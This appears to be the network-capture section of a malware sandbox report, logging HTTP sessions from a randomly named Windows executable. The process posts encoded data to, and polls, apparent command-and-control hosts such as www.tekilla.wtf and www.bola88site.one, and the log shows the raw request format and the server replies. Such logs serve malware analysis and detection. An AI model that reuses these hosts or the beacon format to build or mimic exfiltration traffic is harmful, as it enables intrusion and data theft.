Sep 5, 2024 09:05:48.068279028 CEST	556	OUT	GET /7xi5/?A8_pSPdX=ixI46zwDNWOoK0d6d9oZupQDSeTrSlA+qsFL+v4hzxqFGT4p3+8W5ZPgGBQ8bVBflzmq/wZaho2FRO9YF6xYKTPjOQanpFHctYNa2gQELNdW5L2bG4NjRgFmI2Bw&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.omexai.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:05:48.527137041 CEST	406	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 05 Sep 2024 07:05:48 GMT Content-Type: text/html Content-Length: 266 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 38 5f 70 53 50 64 58 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 36 64 39 6f 5a 75 70 51 44 53 65 54 72 53 6c 41 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 35 5a 50 67 47 42 51 38 62 56 42 66 6c 7a 6d 71 2f 77 5a 61 68 6f 32 46 52 4f 39 59 46 36 78 59 4b 54 50 6a 4f 51 61 6e 70 46 48 63 74 59 4e 61 32 67 51 45 4c 4e 64 57 35 4c 32 62 47 34 4e 6a 52 67 46 6d 49 32 42 77 26 33 38 52 30 3d 6a 48 59 34 6e 46 76 48 41 56 63 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A8_pSPdX=ixI46zwDNWOoK0d6d9oZupQDSeTrSlA+qsFL+v4hzxqFGT4p3+8W5ZPgGBQ8bVBflzmq/wZaho2FRO9YF6xYKTPjOQanpFHctYNa2gQELNdW5L2bG4NjRgFmI2Bw&38R0=jHY4nFvHAVc8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49168	172.191.244.62	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:53.886950016 CEST	2472	OUT	POST /fpzw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.tekilla.wtf Origin: http://www.tekilla.wtf Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.tekilla.wtf/fpzw/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 65 30 70 59 4b 77 72 48 36 75 6a 53 30 5a 66 44 70 75 7a 65 30 7a 38 32 6c 31 45 78 67 79 58 4e 62 5a 6a 36 51 79 68 46 63 57 4e 37 67 55 30 62 61 30 45 58 47 67 50 34 35 56 6e 38 56 70 43 51 4c 71 59 30 2f 44 43 37 4a 44 47 4e 36 77 43 31 4b 73 6a 64 36 2f 61 73 34 41 7a 4a 65 37 56 79 66 38 41 52 52 58 68 76 65 6f 6f 5a 70 68 45 45 33 61 33 56 61 53 41 6f 63 47 72 65 6b 6b 50 65 62 39 52 56 63 71 6c 61 51 2b 39 4a 6c 70 53 53 6a 53 4a 52 54 34 56 58 6c 71 5a 68 66 79 6b 74 33 6b 79 68 54 76 78 45 41 35 6e 36 66 38 42 6c 42 78 64 53 2b 7a 50 74 73 6a 77 38 2b 4b 74 54 58 62 72 67 61 65 64 34 78 74 45 54 79 4a 6d 33 70 43 46 50 34 6b 64 32 70 7a 55 47 55 47 59 69 7a 51 61 48 79 4f 52 6e 6a 4f 45 61 59 37 75 36 6f 35 67 52 4d 65 74 33 64 72 69 30 76 34 62 46 70 57 43 37 53 67 4b 59 72 59 76 43 2b 4f 71 48 6f 58 6a 36 30 53 75 57 68 32 61 48 68 36 4f 2b 69 67 31 49 42 53 2b 37 5a 64 66 69 75 7a 48 74 41 31 32 69 74 50 51 72 38 33 71 2f [TRUNCATED] Data Ascii: A8_pSPdX=imRwTcaaL03jme0pYKwrH6ujS0ZfDpuze0z82l1ExgyXNbZj6QyhFcWN7gU0ba0EXGgP45Vn8VpCQLqY0/DC7JDGN6wC1Ksjd6/as4AzJe7Vyf8ARRXhveooZphEE3a3VaSAocGrekkPeb9RVcqlaQ+9JlpSSjSJRT4VXlqZhfykt3kyhTvxEA5n6f8BlBxdS+zPtsjw8+KtTXbrgaed4xtETyJm3pCFP4kd2pzUGUGYizQaHyORnjOEaY7u6o5gRMet3dri0v4bFpWC7SgKYrYvC+OqHoXj60SuWh2aHh6O+ig1IBS+7ZdfiuzHtA12itPQr83q/zYVBITBec+qgyrqezjwRBwJNd23tuyYPm1iIv+W1/VSOS+4K/Rb3vrtiPj0g+fC3vWiwDjiIiIMwh7Rl4/OLYJGxf/vkS/NwHWEUa+ZXYQnIO57i9RdBKXQvXpsMP/41nFfyLi8hWtTyb7e/6Dn2sIBOvNuGIgARwfk5EhT8dN4HbkaJ9+YCU1HvLxTv1qTs/fND/wEPagzfdwGeCxBF40TBfk8+QhYtxq80ENmPrpVyp1lcj0wrTf0YyU3+5wLmk+QSoIzWUzXZjUxedWPtlxEFH8njkjpAWBNk7T6eVSM4lEYRXdJww/yCxfCgy90EViD2YGW9VBi6XEZFJ4uiYXGetKsj97WkS7lTHeQu1FrL7J8hEzkkeJ1sb57hPzvTICGSp+B26Q14omfCLpqjjpJ6PotqXZlVVBmFAdrgaQrRofJG9fQf+yuxC3k0PFBs9xRH0dVyC/QwlC9x1M8DpoXbb4o0GCSTRKGxhrK4R+loxVWbABqZvzzN/baIO0rOZrUPzDlZ9WhbHJ0AG5m0/Jo58q3b+sqj+CBwq1wTK7MMt3IfV5Eaw29iYLTZmIzqwBx7IGgasLf+yppKGXSB8zYkOstjBF9ZA17pH7w3Rp/7JVKYf+6ldSfIegBCBfiIolo8DdG5w59f9infYC5UZAErBKY9qbOiI1 [TRUNCATED]
Sep 5, 2024 09:05:53.892004013 CEST	298	OUT	Data Raw: 4b 4f 4a 39 46 6f 6d 31 70 75 79 67 42 63 69 48 38 6b 48 6b 4c 33 73 37 72 49 46 74 6a 45 62 68 55 34 51 76 30 34 75 42 44 30 66 2f 59 31 76 4c 59 4e 58 36 42 67 65 44 68 6e 49 4f 39 4b 6b 67 73 50 4e 75 79 33 57 5a 48 32 4e 41 69 48 39 39 39 4c Data Ascii: KOJ9Fom1puygBciH8kHkL3s7rIFtjEbhU4Qv04uBD0f/Y1vLYNX6BgeDhnIO9KkgsPNuy3WZH2NAiH999Ls+WSizKba76f1gnmbvGGCKfRRIIx0Wt6c0QfLasLblfyukvV9KfF9n3euu0/Ore5duiSrQd5mZqwo9wR9/ERGkN+NIYDElRaMTUdgz1U4uAMp6CErYhVhJrWU60gh3ZupQyKU7/lgJ72T48Ifih/7c+c+JUlJexPb
Sep 5, 2024 09:05:54.336317062 CEST	195	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Thu, 05 Sep 2024 07:05:54 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49169	172.191.244.62	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:56.453758955 CEST	2472	OUT	POST /fpzw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.tekilla.wtf Origin: http://www.tekilla.wtf Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.tekilla.wtf/fpzw/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 66 75 6b 38 30 38 79 68 53 76 79 64 41 35 6b 6b 76 38 42 72 68 78 54 53 2b 7a 54 74 73 6a 77 38 2b 65 74 53 48 62 72 67 62 65 63 33 52 74 45 49 79 4a 76 34 4a 2b 33 50 34 67 2f 32 6f 43 72 47 6c 43 59 68 78 34 61 44 43 4f 52 76 7a 4f 47 61 59 37 7a 31 49 35 57 52 4d 57 4c 33 64 62 49 30 76 34 62 46 71 65 43 74 52 49 4b 52 62 59 76 4b 65 4f 70 52 59 58 73 36 30 57 41 57 67 79 61 48 6a 4b 4f 39 30 51 31 44 6b 2b 2f 30 4a 64 6b 70 4f 7a 4a 70 41 31 5a 69 70 58 36 72 38 76 41 2f [TRUNCATED] Data Ascii: A8_pSPdX=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhfuk808yhSvydA5kkv8BrhxTS+zTtsjw8+etSHbrgbec3RtEIyJv4J+3P4g/2oCrGlCYhx4aDCORvzOGaY7z1I5WRMWL3dbI0v4bFqeCtRIKRbYvKeOpRYXs60WAWgyaHjKO90Q1Dk+/0JdkpOzJpA1ZipX6r8vA/zoVBMrBc+WqnCr1WTj0VBMzNd+Jtu2IPlBiHdWWiN9dAC++avRr9PrLiP3ag+/C3eeixCPiPVla1R6X2o/jB4IHxfqskXTdx3GEUq+ZVNMgKe50ptQcYaWVvXodMN3O2WtfyLS8gA5Tyb7R66DhksFSOvRqGI8QR2jk5VRT8cN4NbkaHd+fN004vL1pv1DusP7NEeAENZIzY9wENCxMLY0KBf08+VYTtxS81hhmdapVr51hTz1wrTfGYyAN+5gbmgSQSt8zSlzXTDU0YdWDplxNFBl4jk3HAUxNlaz6fkSM+FEaZ3dJ5Q/QCxn4gw4JEUqD2tiW1VA0gHEYHJ4p0oXUes6sj9nWkR7lTwiQ9yZrDrJ+vky1r7RjsbpdhOnFTJuGIcKBx44024mjUbpkyTpl6Po5qT04UgNmEVRri/woZofOPdfhCuyaxCmz0OxRsM9RH1tVngXQw1C9x1M/DpoTbb0G0HysTRKGjArK4nql9BVXGQBLdvywN5HoIOsNOavUPijlZ9WiVXJ7Jm5h0/V158rWb+gqjI6BzZNwQoTMKN3IYV5DPA28iYLYZnF2qypx1c2gbuzciSpob2WRLc2akOg1jFd9Y3V7q27w3Bp/2JVLMv+vhdfGIesnCF6pLcho9yNG0R58K9imS4C7UZF0rBCA9pLwiId [TRUNCATED]
Sep 5, 2024 09:05:56.458807945 CEST	1762	OUT	Data Raw: 4b 67 4a 34 70 34 6d 78 5a 75 79 69 4a 63 69 6d 38 6b 45 45 4c 30 7a 72 72 56 46 74 69 52 62 6c 35 4e 51 75 49 53 75 43 62 30 66 63 51 31 6f 35 77 4e 4a 61 42 2b 65 44 68 70 48 75 42 2f 6b 67 73 6c 4e 75 75 33 57 5a 58 32 4e 41 43 48 2b 4e 39 49 Data Ascii: KgJ4p4mxZuyiJcim8kEEL0zrrVFtiRbl5NQuISuCb0fcQ1o5wNJaB+eDhpHuB/kgslNuu3WZX2NACH+N9IluWT6jKcQb6D1gmXbrOgCKrRRbwxiUF6cEQZA6sUflTgukiH9Kuw6VPeucM/LZ25KeiRjwdomZmLo5sr99s/GQl+N4YDAnpdITUbnz1j4uAwp6KIrZdFhNHWU8gghHZh5wyMEr+wgJ2aT40mfiR/7cic9pEleuxPT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49170	172.191.244.62	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:58.986433029 CEST	556	OUT	GET /fpzw/?38R0=jHY4nFvHAVc8&A8_pSPdX=vk5QQsijTkj0pfF2YfQUWsKzZGFZZr+gcHfTrVh5yCT2NPNs5yeYQ+2oymVMaPQsdmNH36JHgT5sE/S60pHG7YfuD+9f6MY/b5+Sh71Gd/3RqNcTHTmfk9YtdJYY HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.tekilla.wtf Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:05:59.458661079 CEST	195	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Thu, 05 Sep 2024 07:05:59 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49171	172.96.191.39	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:04.529366970 CEST	2472	OUT	POST /3qit/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.bola88site.one Origin: http://www.bola88site.one Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.bola88site.one/3qit/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 66 76 73 58 42 6e 36 71 2f 41 63 2f 35 75 72 44 68 75 57 73 41 33 2b 31 4d 43 65 41 50 53 4f 33 32 71 7a 45 59 66 54 6c 66 6c 77 48 4a 51 30 64 78 50 6d 51 41 58 5a 38 2f 31 48 36 32 6b 34 36 46 53 4c 71 57 55 33 58 69 74 72 77 35 64 7a 42 73 47 76 44 6b 57 74 42 5a 4a 31 49 32 32 61 79 79 33 36 37 46 41 4c 67 59 74 78 64 47 63 4c 65 31 75 45 74 69 46 62 4a 49 54 7a 58 38 46 39 2f 47 56 2f 79 4d 59 57 65 76 51 54 65 7a 5a 4e 79 6c 47 56 65 59 35 74 41 6e 6b 69 6a 63 5a 39 6a 6c 4b 4c 50 7a 35 45 2f 68 53 77 4f 34 46 61 31 4f 58 61 4c 51 77 6c 77 4c 31 4c 78 6e 35 37 6e 58 78 31 79 78 61 51 36 36 62 4c 59 57 52 45 67 50 52 38 77 7a 4f 4d 77 70 6e 32 51 79 65 65 6c 37 4b 65 52 50 61 79 79 53 43 7a 62 44 38 36 51 53 76 75 35 4d 6c 48 50 5a 61 52 73 4b 55 5a 37 74 4b 2b 54 54 53 74 4b 46 7a 6c 6b 50 75 5a 77 33 52 61 62 2f 67 71 39 4a 75 4a 4c 61 6f 6a 65 51 41 43 49 47 36 65 4c 58 39 6d 72 58 69 33 74 48 4a 61 64 59 51 6d 6d 4a 5a 66 58 [TRUNCATED] Data Ascii: A8_pSPdX=g1Eybgs1boaXhfvsXBn6q/Ac/5urDhuWsA3+1MCeAPSO32qzEYfTlflwHJQ0dxPmQAXZ8/1H62k46FSLqWU3Xitrw5dzBsGvDkWtBZJ1I22ayy367FALgYtxdGcLe1uEtiFbJITzX8F9/GV/yMYWevQTezZNylGVeY5tAnkijcZ9jlKLPz5E/hSwO4Fa1OXaLQwlwL1Lxn57nXx1yxaQ66bLYWREgPR8wzOMwpn2Qyeel7KeRPayySCzbD86QSvu5MlHPZaRsKUZ7tK+TTStKFzlkPuZw3Rab/gq9JuJLaojeQACIG6eLX9mrXi3tHJadYQmmJZfXolwv7QOrI+ACfrnkJywgMDx4piGI8YUKOq0Ym56Cvb44TLgptRIWYbqwdf0dMcLG1vFmPj8T444IFXJAiuQvyiwlFVliH728GAe7a2LLfkfE/VYRzh6P6H10jm1FRHGwkrj7CiCDQuVp83EZUyk+cqYm1yAP0o1CmwO+Lcy1YKJdpQgqxGOheTy14uQeqDw+MqikVBHse5jpsFAZ3kne+UO4ZHdljZ2V8NEcg4nLES2GqDI4zgftxKF2snY+79NN+lfzC7O3vpFqCvli5IbXz8aD9HTUNjA3JvrSdLpHSPPvDt6gXemPgP23pwEPIIDWpvPB6zncUE2l2+NXU8KHcRfhsRXcTbLkGoLh6Wvezv2ASkZNYZW5XDmmBfaFIJgVHf+tVWNl0taWKdYAtERLCsVaJ4Ls4rqSHPwP4gQ8eekgecRceQEzIBIvQkVDteHNGsSwc0R6YVTg7vTZyR7mHo8SmTCDAe3Le7wpvLHqoYadnNiY+m3ub3JZI7z7Vjdyf16vRlPG3E4jAfHXa5NCKyLYKQsN66X0thVofSEm9lsSXMTPpnRg3VKaRAevG45ZGkbY2T9P78J1f3HGTnIyNEJ5hA+E7IaOfGLjXnt1oobcCrCaPWH/NKsXSWtZsCJ/ldlkWbHjOC99+5buQuF/DIiUiY2t5tk9xM [TRUNCATED]
Sep 5, 2024 09:06:04.534265995 CEST	307	OUT	Data Raw: 36 79 49 63 52 4c 75 46 59 4b 5a 7a 61 65 48 62 57 79 50 68 36 4e 57 42 44 74 32 57 41 49 30 72 44 79 55 6c 72 75 53 39 31 34 79 6a 42 35 6e 4d 77 37 2f 47 58 32 47 66 35 6f 69 47 79 42 39 79 56 75 76 46 48 42 65 67 61 50 43 69 70 77 4e 33 4a 53 Data Ascii: 6yIcRLuFYKZzaeHbWyPh6NWBDt2WAI0rDyUlruS914yjB5nMw7/GX2Gf5oiGyB9yVuvFHBegaPCipwN3JSHucxkpcW3u65l1bdI8m2gGuVkE4FwonoYbaf1ofhb3AZeku7SupKA0YDch20Fi6/rZtI51DnfsZ30XIQ6ALok9D3pocWOrhCEBXmoN+dUgBdxKs/inuUmmtSbDyJ46AUgwsQiNncuIXyHinACbMEMrRbiPARZXp1x
Sep 5, 2024 09:06:05.425697088 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 05 Sep 2024 07:06:05 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49172	172.96.191.39	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:07.083276987 CEST	2472	OUT	POST /3qit/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.bola88site.one Origin: http://www.bola88site.one Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.bola88site.one/3qit/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 63 56 39 78 69 4b 4c 50 77 52 44 69 68 54 43 4b 34 46 61 78 4f 58 59 4c 51 77 35 77 4c 31 4c 78 6e 46 37 6d 48 78 31 79 77 61 58 6b 4b 62 4c 62 57 52 4a 6b 50 74 53 77 7a 62 64 77 6f 58 6d 52 44 57 65 30 50 79 65 56 2f 61 79 6a 53 43 78 62 44 38 33 65 79 76 79 35 4d 39 31 50 5a 4c 4d 73 4b 55 5a 37 76 79 2b 45 52 36 74 4e 56 7a 6c 37 66 75 63 35 58 52 5a 62 2b 55 79 39 4a 61 4a 4c 62 67 6a 66 69 49 43 63 77 75 5a 41 48 39 6a 36 6e 69 78 70 48 4a 31 64 5a 38 59 6d 4b 34 49 58 [TRUNCATED] Data Ascii: A8_pSPdX=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjcV9xiKLPwRDihTCK4FaxOXYLQw5wL1LxnF7mHx1ywaXkKbLbWRJkPtSwzbdwoXmRDWe0PyeV/ayjSCxbD83eyvy5M91PZLMsKUZ7vy+ER6tNVzl7fuc5XRZb+Uy9JaJLbgjfiICcwuZAH9j6nixpHJ1dZ8YmK4IXpVwv98Opp+ABvrkppz3x8f94pqoI8VjKMu0ejN6KNz59jKpstRRd4bmwdKVdOELFALFnM78Zvk7ElXOEiu9lSj5lB99iD/m93wepa2LHcceGvVXYThsBqHr0jmLFRmxwQDj7B6CCDWVp83HS0y5w8u6m1+EP0kfClYO+aMy1ceJQpQgxBGJ0OTW15KheufG58Oil3JHqYtjvMFCVXkmAOVk4drdlitmV/9EcCQnKhu2KKDMkjhetxL22sru+7s2N9RfzD7O/KFFwSvkk5IXTz85D9/DUN2l3LPrT8rpFjPPujt4iXemVQO13oY6PIU5Wo3PBrjna0E36W+OVU8LNMQQhsBXcTHLkGQL9ZSvJln2MCkbBIYDsnfamBPsFNxKVEb+rR6Ni2VZZadWFtELays5aJ4Hs4CvTzPwPpAQ+7qnpecSauQfu4AgvQV+DpWxNx8SwckR6r9TgLvTZyR4mHoCSmf3DEaNLe7wp+LHqbwaVHNtRenp9L3tZLWg7WS2ycB6vFpPG3Fu+AfAa65CCKOaYKRPN6GX3fNVpOyEmfNsaXMTZ5nW6HVLaRAOvDNiZHkbaGz9O5EK5P3CETne7tYW5hdtE5kaOv6Lx2ntyYobCyrBP/WSys31XSKTZoGZ/xBlrFjHvta6xu5WqQub/DEJUiR7t69e9y8 [TRUNCATED]
Sep 5, 2024 09:06:07.089987040 CEST	1771	OUT	Data Raw: 36 79 66 52 78 4c 52 46 59 4b 4e 7a 62 65 74 62 54 43 50 68 37 42 57 47 6b 35 32 57 67 49 31 67 6a 7a 49 6c 72 76 56 39 32 49 41 6a 41 55 2f 4d 31 33 2f 48 30 2b 47 52 71 77 69 42 79 42 7a 79 56 75 66 61 33 45 6d 67 61 50 6b 69 73 4d 4e 33 4a 43 Data Ascii: 6yfRxLRFYKNzbetbTCPh7BWGk52WgI1gjzIlrvV92IAjAU/M13/H0+GRqwiByBzyVufa3EmgaPkisMN3JCHublkosW4x65gtLcA3G3xGuUXE8NWohEYYJn1vuhb3wZY3O6IlJHH0YPYh2FwjLfrbYU52B/fmp3xL4Q7AL179DnTodHh+EuET3moAbpbthdzAM/knuUOmtaXDwMn6BMgwv4iPXctMnyFjnAYbMI2rRTAPAhZXopx
Sep 5, 2024 09:06:07.984194994 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 05 Sep 2024 07:06:07 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 